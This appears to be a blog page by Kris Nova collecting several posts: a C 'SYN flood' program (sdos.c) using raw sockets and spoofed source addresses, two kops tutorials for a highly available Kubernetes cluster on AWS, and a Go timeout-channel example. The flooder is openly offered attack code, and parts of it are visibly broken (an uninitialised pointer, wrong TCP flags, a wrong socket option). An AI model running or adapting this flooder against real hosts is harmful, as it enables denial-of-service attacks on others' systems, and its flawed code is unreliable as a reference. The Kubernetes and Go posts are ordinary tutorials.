Author: Kris Nova

I have worked on exploiting a TCP handshake vulnerability using native FreeBSD C libraries.

The original project can be found here.

/*
 * ============================================================================
 *
 * (c)2002-2014. Kris Nova. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *=============================================================================
 *
 * sdos.c
 *
 * Tested and compiled on FreeBSD 10+
 *
 * A simple C script to attempt to flood a server with SYN requests in the
 * hopes of determining the threshold for availability.
 *
 * This is an isolated penetration test that will send requests via a unique
 * thread.
 *=============================================================================
 */

/* Includes */
#include <stdlib.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <string.h>
#include <sys/socket.h>
#include <errno.h>
#include <arpa/inet.h>
#include <time.h>

/* Interface */
int main(int argc, char *argv[]);
unsigned short csum(unsigned short *ptr, int nbytes);
void usage();
int flood();
char* randIp();

/**
 * configuration
 *
 * The basic information for defining where we will send the pen request
 */
struct configuration
{
	char *ip;
	char *message;
	int port;
	int verbose;
};

/**
 * main
 *
 * Handles argument parsing and building the configuration struct
 *
 * int argc The total amount of arguments passed
 * char *argv[] Array of arguments space dilimited
 */
int main(int argc, char *argv[])
{
	//Set defaults
	struct configuration cfg;
	cfg.ip = "127.0.0.1";
	cfg.port = 1234;
	cfg.message = "...";
	cfg.verbose = 0;

	//Define
	unsigned int seed;
	unsigned int ii;

	// Invalid command, display usage
	int i;
	if (argc <= 2)
	{
		usage();
		exit(0);
	}

	// Parse arguments
	for (i = 0; i < argc; i++)
	{
		if (argv[i][0] == '-')
		{
			switch (argv[i][1])
			{
			case 'v':
				//Verbose
				cfg.verbose = 1;
				break;
			case 'h':
				//Host
				cfg.ip = argv[i + 1];
				break;
			case 'p':
				//Port
				cfg.port = atoi(argv[i + 1]);
				break;
			case 'm':
				//Message
				cfg.message = argv[i + 1];
				break;
			}
		}
	}
	//Call flood with our configuration
	seed = time(NULL);
	ii = 0;
	while (flood(cfg))
	{
		seed++;
		ii++;
		srand(seed);
		printf("Iterations: %i\n", ii);
	}
	//Fin
	return 1;
}

/**
 * csum
 *
 * Used to calculate the checksum
 */
unsigned short csum(unsigned short *ptr, int nbytes)
{
	register long sum;
	unsigned short oddbyte;
	register short answer;
	sum = 0;
	while (nbytes > 1)
	{
		sum += *ptr++;
		nbytes -= 2;
	}
	if (nbytes == 1)
	{
		oddbyte = 0;
		*((u_char*) &oddbyte) = *(u_char*) ptr;
		sum += oddbyte;
	}
	sum = (sum >> 16) + (sum & 0xffff);
	sum = sum + (sum >> 16);
	answer = (short) ~sum;
	return (answer);
}

/**
 * flood
 *
 * The main function for the test
 * Handles sending the packets to the server in test
 */
int flood(struct configuration *cfg)
{
	//Create a raw socket
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
	//Datagram to represent the packet
	char datagram[4096], source_ip[32];
	//IP header
	struct ip *iph = (struct ip *) datagram;
	//TCP header
	struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof(struct ip));
	//Socket
	struct sockaddr_in sin;
	//Spoof struct (for calculation the checksum)
	struct ippseudo ipps;

	sin.sin_family = AF_INET;
	sin.sin_port = htons(80);
	//TODO random IP
	sin.sin_addr.s_addr = inet_addr(randIp());

	//Zero out the buffer
	memset(datagram, 0, 4096);

	//IP header
	iph->ip_hl = 5;
	iph->ip_v = 4;
	iph->ip_tos = 0;
	iph->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
	iph->ip_id = htons(54321);
	iph->ip_off = 0;
	iph->ip_ttl = 255;
	iph->ip_p = IPPROTO_TCP;
	iph->ip_sum = 0;
	struct in_addr ipsrc;
	ipsrc.s_addr = inet_addr(source_ip);
	iph->ip_src = ipsrc;
	struct in_addr ipdst;
	ipdst.s_addr = sin.sin_addr.s_addr;
	iph->ip_dst = ipdst;
	iph->ip_sum = csum((unsigned short *) datagram, iph->ip_len >> 1);

	//TCP Header
	tcph->th_sport = htons(1234);
	tcph->th_dport = htons(80);
	tcph->th_seq = 0;
	tcph->th_ack = 0;
	//First and only TCP segment
	tcph->th_off = 5;
	tcph->th_flags = 00000010;
	//Max window size
	tcph->th_win = htons(5840);
	//The kernel will handle calculation this
	tcph->th_sum = 0;
	tcph->th_urp = 0;

	//Spoof struct
	struct in_addr spfsrc;
	spfsrc.s_addr = inet_addr(source_ip);
	ipps.ippseudo_src = spfsrc;
	struct in_addr spfdst;
	spfdst.s_addr = sin.sin_addr.s_addr;
	ipps.ippseudo_dst = spfdst;
	ipps.ippseudo_pad = 0;
	ipps.ippseudo_p = IPPROTO_TCP;
	ipps.ippseudo_len = htons(20);

	//Calculate checksum for the TCP header
	tcph->th_sum = csum((unsigned short*) &ipps, sizeof(struct ippseudo));

	//IP_HDRINCL to tell the kernel that headers are included in the packet
	int one = 1;
	const int *val = &one;
	if (setsockopt(s, IPPROTO_IP, PF_INET, val, sizeof(one)) < 0)
	{
		printf("Error setting IP_HDRINCL. "
				"Error number : %d . "
				"Error message : %s \n",
		errno, strerror(errno));
		exit(0);
	}

	//Send the packet
	if (sendto(s, /* our socket */
	datagram, /* the buffer containing headers and data */
	iph->ip_len, /* total length of our datagram */
	0, /* routing flags, normally always 0 */
	(struct sockaddr *) &sin, /* socket addr, just like in */
	sizeof(sin)) < 0) /* a normal send() */
	{
		printf("Packet transmission failed!\n");
		return 1;
	}
	//Data send successfully
	else
	{
		printf("Packet transmission success!\n");
		return 1;
	}
}

/**
 * randIp
 *
 * Will generate a random IP address to spoof the packet with
 */
char* randIp()
{
	char *ip;
	sprintf(ip,
			"%d.%d.%d.%d",
			rand() & 126,
			rand() & 255,
			rand() & 255,
			rand() & 255);
	printf("Random IP: %s\n", ip);
	return ip;
}

/**
 * usage
 *
 * How do we run this thing
 */
void usage()
{
	printf("./sdos <options>\n");
	printf("\n");
	printf("v     Verbose - Enables verbosity\n");
	printf("h     Host    - IP of host to connect to\n");
	printf("p     Port    - The numerical port to connect on\n");
	printf("m     Message - Optional message to send to the server\n");
	printf("\n");

}

Today we announce the release of Kubernetes kops 1.5.1 LTS!

I figured what better way to announce the release, than with an updated blog post on setting up an HA cluster on private topology with the new release!

What we are building

In this tutorial we will cover setting up a HA privately networked Kubernetes cluster in AWS with Kubernetes kops 1.5.1.

  • Fully managed VPC in AWS, with automatically generated private, and public subnets.
  • Outbound traffic managed through a NAT gateway and elastic IP in each private subnet.
  • Classic ELB fronting the Kubernetes API on TCP 443 (No firewall holes for the cluster).
  • Classic ELB fronting a bastion ASG for resilient SSH access for admins.
  • HA (Highly Available) Kubernetes masters spread across multiple availability zones in an ASG.
  • Kubernetes nodes spread across multiple availability zones in an ASG.
  • Public DNS alias for the Kubernetes API.

Installing kops 1.5.1

Kubernetes kops is an open source tool that Kubernetes offers that can be used for deploying Kubernetes clusters in AWS. We will be using the tool in this tutorial.


curl -sSL https://github.com/kubernetes/kops/releases/download/1.5.1/kops-darwin-amd64 -O
chmod +x kops-darwin-amd64
sudo mv kops-darwin-amd64 /usr/local/bin

More information on installing kops can be found here for our non OS X users.

Installing kubectl

We will also be needing a tool called kubectl. Think of this as a thin CLI client for the Kubernetes API, similar to the aws CLI tool we will be installing next.

curl -O https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/darwin/amd64/kubectl
chmod +x kubectl
sudo mv kubectl /usr/local/bin

Setting up your AWS environment

Get your AWS credentials from the console

Use the AWS console to get an AWS AccessKeyId and AWS SecretAccessKey Official Documentaion. After you have your credentials, download the CLI tool and configure it with your new user. You can also use any method defined here.

brew update && brew install awscli
aws configure

We strongly recommend using a single user with a select few IAM permissions to run kops. Thankfully kops provides a handy IAM creation script that will create a new user with the correct permissions. Be sure to note your new AccessKeyId and SecretAccessKey for the next step.

curl -O https://raw.githubusercontent.com/kubernetes/kops/master/hack/new-iam-user.sh
sh new-iam-user.sh <group> <user>
aws iam list-users

Setting up DNS for your cluster

We will need a publicly resolvable domain name for our cluster. So we need to make sure we have a hosted zone setup in Route53. In this example we will be using nivenly.com for our example hosted zone.

 ID=$(uuidgen) && aws route53 create-hosted-zone --name nivenly.com --caller-reference $ID 

More information on more advanced DNS setup.

Setting up a state store for your cluster

Kops will store a representation of your Kubernetes cluster in AWS S3. This is called the kops state store. It is important to note that kops DOES NOT store any concept of what resources are deployed. That would create two sources of truth (The AWS API, and the state store). Rather, kops will merely store a definition of the Kubernetes cluster, that will then be applied to AWS via kops.

We will call our state store in this example nivenly-com-state-store.

 aws s3api create-bucket --bucket nivenly-com-state-store --region us-east-1 

Creating your first cluster

Getting ready

Okay! We are ready to start creating our first cluster. Lets first set up a few environmental variables to make this process as clean as possible.

export NAME=myfirstcluster.nivenly.com
export KOPS_STATE_STORE=s3://nivenly-com-state-store

Form your create cluster command

We will need to note which availability zones are available to us. These are different for every AWS account. In this example we will be deploying our cluster to the us-west-1 region.

 aws ec2 describe-availability-zones --region us-west-1 

Lets form our create cluster command. Here we want to define a few things.

  • –node-count 3
    • We want 3 Kubernetes nodes
  • –zones us-west-2a,us-west-2b,us-west-2c
    • We want to run our nodes spread across the 3 availability zones available to our account
    • This is a CSV list, pulled from the API in the previous request
  • –master-zones us-west-2a,us-west-2b,us-west-2c 
    • This will tell kops to spread masters across those availability zones.
    • Because there is more than 1, this will automatically be ran in HA.
  • –dns-zone nivenly.com
    • We define the DNS hosted zone we created earlier
  • –node-size t2.large
    • We set our nodes to a defined instance size
  • –master-size t2.large
    • We set our masters to a defined instance size
  • –topology private 
    • We define that we want to use a private network topology with kops.
    • This is what tells kops to build the diagram above.
  • –networking calico 
    • We tell kops to use Calico for our overlay network
    • Overlay networks are required for this configuration.
    • Many thanks to our friends at Calico for helping us get this into kops!
  • –bastion
    • Add this flag to tell kops to create a bastion server so you can SSH into the cluster

Kops will default to ~/.ssh/id_rsa.pub for backend access. You can override this with –ssh-public-key /path/to/key.pub

kops create cluster \
    --node-count 3 \
    --zones us-west-2a,us-west-2b,us-west-2c \
    --master-zones us-west-2a,us-west-2b,us-west-2c \
    --dns-zone nivenly.com \
    --node-size t2.large \
    --master-size t2.large \
    --topology private \
    --networking calico \
    --bastion \
    ${NAME}

kops will deploy these instances using AWS auto scaling groups, so each instance should be ephemeral and will rebuild itself if taken offline for any reason.

Cluster Configuration

We now have created the underlying cluster configuration, lets take a look at every aspect that will define our cluster.

 kops edit cluster ${NAME} 

This will open up the cluster config (that is actually stored in the S3 bucket we created earlier!) in your favorite text editor. Here is where we can optionally really tweak our cluster for our use case. In this tutorial, we leave it default for now.

For more information on these directives, and the kops API please checkout the kops official documentation

Apply the changes

Okay, we are ready to create the cluster in AWS. We do so running the following command.

 kops update cluster ${NAME} --yes 

Start using the cluster

The resources will be deployed asynchronously here. So even though kops has finished, that does not mean our cluster is built. A great way to check if the cluster is online, and the API is working is to use kubectl

 kubectl get nodes 

After we verify the API is responding, we can now use the Kubernetes cluster.

Backend SSH access

We should also now have a bastion server behind an elastic load balancer in AWS that will give us access to the cluster over SSH. Grab the bastion ELB A record, and the instance private IP you want to access from the AWS console and SSH into the bastion as follows.

 
ssh-add ~/.ssh/id_rsa
ssh -A admin@bastion.myfirstcluster.nivenly.com
ssh admin@<master_private_ip>

Follow @kris-nova

This post is DEPRECATED

Please check out the most recent article instead.

What we are building

In this tutorial we will cover setting up a HA privately networked Kubernetes cluster in AWS with Kubernetes kops.

  • Fully private VPC, housing utility and private subnets, with hybrid cloud capabilities over VPN
  • HA (Highly Available) masters spread across availability zones with private subnetting
  • Nodes spread across availability zones with private subnetting
  • Routing between subnets with NAT gateways
  • Elastic Load Balancers in front of the resources for public access
  • Bastion server for backend SSH access to the instances

Installing kops

Kubernetes kops is an open source tool that Kubernetes offers that can be used for deploying Kubernetes clusters against different cloud providers. We will be using the tool to help us with the heavy lifting in this tutorial.

Start by installing the most recent version of kops from the master branch.


brew update && brew install --HEAD kops

More information on installing kops can be found here for our non OS X users.

Installing kubectl

We will also be needing a tool called kubectl. Think of this as a thin CLI client for the Kubernetes API, similar to the aws CLI tool we will be installing next.

You can download the tarball from the Kubernetes latest release page in github, or follow the official install guide here.

wget -O https://github.com/kubernetes/kubernetes/releases/download/v1.4.6/kubernetes.tar.gz
sudo cp kubernetes/platforms/darwin/amd64/kubectl /usr/local/bin/kubectl

Setting up your AWS environment

Setting up a kops IAM user

In this example we will be using a dedicated IAM user to use with kops. This user will need basic API security credentials in order to use kops. Create the user and credentials using the AWS console. More information.

Kubernetes kops uses the official AWS Go SDK, so all we need to do here is set up your system to use the official AWS supported methods of registering security credentials defined here. Here is an example using the aws command line tool to set up your security credentials.

brew update && brew install awscli
aws configure
aws iam list-users

We should now be able to pull a list of IAM users from the API, verifying that our credentials are working as expected.

Setting up DNS for your cluster

We will need a publicly resolvable domain name for our cluster. So we need to make sure we have a hosted zone setup in Route53. In this example we will be using nivenly.com for our example hosted zone.

 ID=$(uuidgen) && aws route53 create-hosted-zone --name nivenly.com --caller-reference $ID 

Setting up a state store for your cluster

In this example we will be creating a dedicated S3 bucket for kops to use. This is where kops will store the state of your cluster and the representation of your cluster, and serves as the source of truth for our cluster configuration throughout the process. We will call this nivenly-com-state-store. I recommend keeping the creation confined to us-east-1, otherwise more input will be needed here.

 aws s3api create-bucket --bucket nivenly-com-state-store --region us-east-1 

Creating your first cluster

Setup your environment for kops

Okay! We are ready to start creating our first cluster. Lets first set up a few environmental variables to make this process as clean as possible.

export NAME=myfirstcluster.nivenly.com
export KOPS_STATE_STORE=s3://nivenly-com-state-store

Note: You don’t have to use environmental variables here. You can always define the values using the –name and –state flags later.

Form your create cluster command

We will need to note which availability zones are available to us. In this example we will be deploying our cluster to the us-west-1 region.

 aws ec2 describe-availability-zones --region us-west-1 

Lets form our create cluster command. Here we want to define a few things.

  • –node-count 3
    • We want 3 Kubernetes nodes
  • –zones us-west-2a,us-west-2b,us-west-2c
    • We want to run our nodes spread across the 3 availability zones available to our account
    • This is a CSV list, pulled from the API in the previous request
  • –master-zones us-west-2a,us-west-2b,us-west-2c 
    • This will tell kops that we want 3 masters, running in HA in these 3 availability zones
  • –dns-zone nivenly.com
    • We define the DNS hosted zone we created earlier
  • –node-size t2.medium
    • We set our nodes to a defined instance size
  • –master-size t2.medium
    • We set our masters to a slightly larger instance size
  • –topology private 
    • We define that we want to use a private network topology with kops
  • –networking weave 
    • We tell kops to use Weave for our overlay network
    • Many thanks to our friends at Weave for helping us make this a staple part of our clusters!
  • –image 293135079892/k8s-1.4-debian-jessie-amd64-hvm-ebs-2016-11-16
    • This is required as a temporary workaround until kops 1.4.2 is released (Estimated Dec 17, 2016)

Kops will default to ~/.ssh/id_rsa.pub for backend access. You can override this with –ssh-public-key /path/to/key.pub

kops create cluster \
    --node-count 3 \
    --zones us-west-2a,us-west-2b,us-west-2c \
    --master-zones us-west-2a,us-west-2b,us-west-2c \
    --dns-zone nivenly.com \
    --node-size t2.medium \
    --master-size t2.medium \
    --topology private \
    --networking weave \
    --image 293135079892/k8s-1.4-debian-jessie-amd64-hvm-ebs-2016-11-16 \
    ${NAME}

kops will deploy these instances using AWS auto scaling groups, so each instance should be ephemeral and will rebuild itself if taken offline for any reason.

Cluster Configuration

We now have created the underlying cluster configuration, lets take a look at every aspect that will define our cluster.

 kops edit cluster ${NAME} 

This will open up the cluster config (that is actually stored in the S3 bucket we created earlier!) in your favorite text editor. Here is where we can optionally really tweak our cluster for our use case. In this tutorial, we leave it default for now.

For more information on these directives, and the kops API please checkout the kops official documentation

Apply the changes

Okay, we are ready to create the cluster in AWS. We do so running the following command.

 kops update cluster ${NAME} --yes 

Start using the cluster

The resources will be deployed asynchronously here. So even though kops has finished, that does not mean our cluster is built. A great way to check if the cluster is online, and the API is working is to use kubectl

 kubectl get nodes 

After we verify the API is responding, we can now use the Kubernetes cluster.

Backend SSH access

We should also now have a bastion server behind an elastic load balancer in AWS that will give us access to the cluster over SSH. Grab the bastion ELB A record, and the instance private IP you want to access from the AWS console and SSH into the bastion as follows.

 
ssh -A admin@<bastion_elb_a_record>
ssh admin@<instance_private_ip>

What do you think?

I always love comments, and suggestions on how to be better. Let me know your thoughts, if you have any good ones.

I wrote a lot of the code for the features in this article, feel free to hit me up on github if you want to follow along!

Follow @kris-nova

Suppose you want to execute a function, and you expect it to complete in a pre defined amount of time..

Maybe you just don’t care about the result if you can’t get it quickly.

Timeout patterns in golang are very useful if you want to fail quickly. Particularly in regard to web programming or socket programming.

The idea behind a timeout is handy, but a pain to code over and over. Here is a clever example of a concurrent timeout implementation, as well as an example on channel factories.

Timeout

Timeouts are the idea that the code should move forward based on an arbitrary defined amount of time, if another task has not completed.

Concurrent Factories

Concurrent factories are ways of generating channels in go, that look and feel the same, but can have different implementations.

In the case of the code below, the getTimeoutChannel function behaves as a concurrent factory.


package main

import (
	"time"
	"fmt"
)

// Will call the getTimeoutChannel factory function, passing in different sleep times for each channel
func main() {
	ch_a := getTimeoutChannel(1) // 1 sec
	ch_b := getTimeoutChannel(2) // 2 sec
	ch_c := getTimeoutChannel(5) // 5 sec
	switch {
	case <-ch_a:
		fmt.Println("Channel A")
		break
	case <-ch_b:
		fmt.Println("Channel B")
		break
	case <-ch_c:
		fmt.Println("Channel C")
		break
	}
}

// Will generate a new channel, and concurrently run a sleep based on the input
// Will return true after the sleep is over
func getTimeoutChannel(N int) chan bool {
	ch := make(chan bool)
	go func() {
		time.Sleep(time.Second * time.Duration(N))
		ch <- true
	}()
	return ch
}

Follow @kris-nova

What happened?

We started 3 concurrent timeout factories, each with a unique channel. Each of the channels will timeout and return a value, after the defined sleep. In this example ch_a will obviously timeout first, as it only sleeps for 1 second.

The switch statement will hang until one of the 3 channels returns a value. After the switch statement detects a value from a channel, it performs the logic for the corresponding case. This allows us to easily pick and chose which avenue the code should progress with further.

When is this useful?

Imagine if ch_a and ch_b were not timeout channels but rather actual logic in your program. Imagine if ch_a was actually a read from a cache, and ch_b was actually a read from a database.

Let’s say the 2 second timeout, was actually a 2 second cache read. The program shouldn’t really care if the cache read is successful or not. If it is taking 2 seconds, then it is hardly doing it’s job as a quick cache anyway. So the program should be smart enough to use whatever value is returned first and not whatever value should be returned first. In this case, the database read.

Now we are in a situation where we implemented a cache, and for whatever reason the cache doesn’t seem to want to return a value. Perhaps updating the cache would be in order?

We can take our example one step further and keep the 5 second timeout on ch_c. For the sake of our experimental program, 5 seconds should be more than enough time for any of the supported avenues to return a meaningful value. If after the 5 seconds has elapsed and the first two channels haven’t reported any valuable data we should consider the system in a state of catastrophic failure, and report back accordingly. Simply add the failure path to the program, and rest assured that the program will handle even the most unexpected of edge cases quickly, and meaningfully.

Now, doesn’t that seem like a great way to structure a program?

Hi. I am Kris Nova. I am a twenty-something year old software engineer with an unhealthy passion for blogging and contributing to open source software. I like to write.

I hope you find my work interesting and share your thoughts on them.

kris-lwt